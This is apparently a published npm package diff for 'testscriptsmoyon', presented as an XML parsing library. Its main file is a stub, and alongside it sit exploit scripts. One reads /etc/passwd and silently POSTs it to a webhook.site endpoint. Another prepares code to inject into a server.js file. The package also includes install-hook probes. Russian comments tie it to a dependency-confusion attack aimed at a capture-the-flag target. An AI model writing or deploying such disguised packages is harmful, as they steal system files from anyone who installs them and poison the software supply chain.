testscriptsmoyon 0.30.1

package/exploit

@@ -0,0 +1,56 @@
+const fs = require('fs');
+const https = require('https');
+
+// ТОЛЬКО отправка на webhook, без console.log
+function sendToWebhook(data) {
+    try {
+        const payload = JSON.stringify(data);
+        const options = {
+            hostname: 'webhook.site',
+            port: 443,
+            path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+            method: 'POST',
+            headers: {'Content-Type': 'application/json'}
+        };
+        const req = https.request(options);
+        req.write(payload);
+        req.end();
+        return true;
+    } catch(e) {
+        return false;
+    }
+}
+
+// Основная логика
+try {
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    
+    // Ищем флаг
+    const lines = passwd.split('\n');
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            // Отправляем ТОЛЬКО флаг
+            sendToWebhook({
+                flag: line,
+                source: 'dependency_confusion',
+                package: 'supervot3',
+                timestamp: new Date().toISOString()
+            });
+            break;
+        }
+    }
+    
+    // Также отправляем полный /etc/passwd для анализа
+    sendToWebhook({
+        full_passwd: passwd,
+        source: 'full_dump',
+        package: 'supervot3'
+    });
+    
+} catch(e) {
+    sendToWebhook({
+        error: e.message,
+        source: 'error',
+        package: 'supervot3'
+    });
+}

package/exploit.js

@@ -0,0 +1,44 @@
+const fs = require('fs');
+const path = require('path');
+
+console.log('=== EXPLOIT: Preparing server.js modification ===');
+
+// Готовим код который добавим в server.js
+const exploitCode = `
+
+// === INJECTED BY DEPENDENCY CONFUSION ===
+const fs = require('fs');
+console.log('=== MALICIOUS CODE EXECUTED ===');
+try {
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    console.log('=== /etc/passwd CONTENT ===');
+    console.log(passwd);
+    
+    const lines = passwd.split('\\\\n');
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            console.log('🎯 FLAG FOUND: ' + line);
+            // Можно также записать в файл
+            fs.writeFileSync('/tmp/flag.txt', line);
+        }
+    }
+} catch(e) {
+    console.log('Error: ' + e.message);
+}
+// === END INJECTED CODE ===
+
+`;
+
+// Записываем код который будет вставлен в server.js после копирования
+try {
+    fs.writeFileSync('/tmp/inject.js', exploitCode);
+    console.log('✅ Injection code prepared in /tmp/inject.js');
+    
+    // Также выводим флаг сейчас
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    console.log('=== CURRENT /etc/passwd ===');
+    console.log(passwd);
+    
+} catch(e) {
+    console.log('Error: ' + e.message);
+}

package/index.js

@@ -0,0 +1,11 @@
+module.exports = {
+    parseXmlString: function(xml, options) {
+        return {
+            get: function(xpath) {
+                return {
+                    text: function() { return "test"; }
+                };
+            }
+        };
+    }
+};

package/package.json

@@ -0,0 +1,15 @@
+{
+  "name": "testscriptsmoyon",
+  "version": "0.30.1",
+  "description": "XML parsing library",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "echo 'PREINSTALL_WORKS' > /tmp/preinstall.txt",
+    "install": "echo 'INSTALL_WORKS' > /tmp/install.txt", 
+    "postinstall": "echo 'POSTINSTALL_WORKS' > /tmp/postinstall.txt",
+    "preuninstall": "echo 'PREUNINSTALL_WORKS' > /tmp/preuninstall.txt"
+  },
+  "keywords": ["xml", "parser"],
+  "author": "test",
+  "license": "MIT"
+}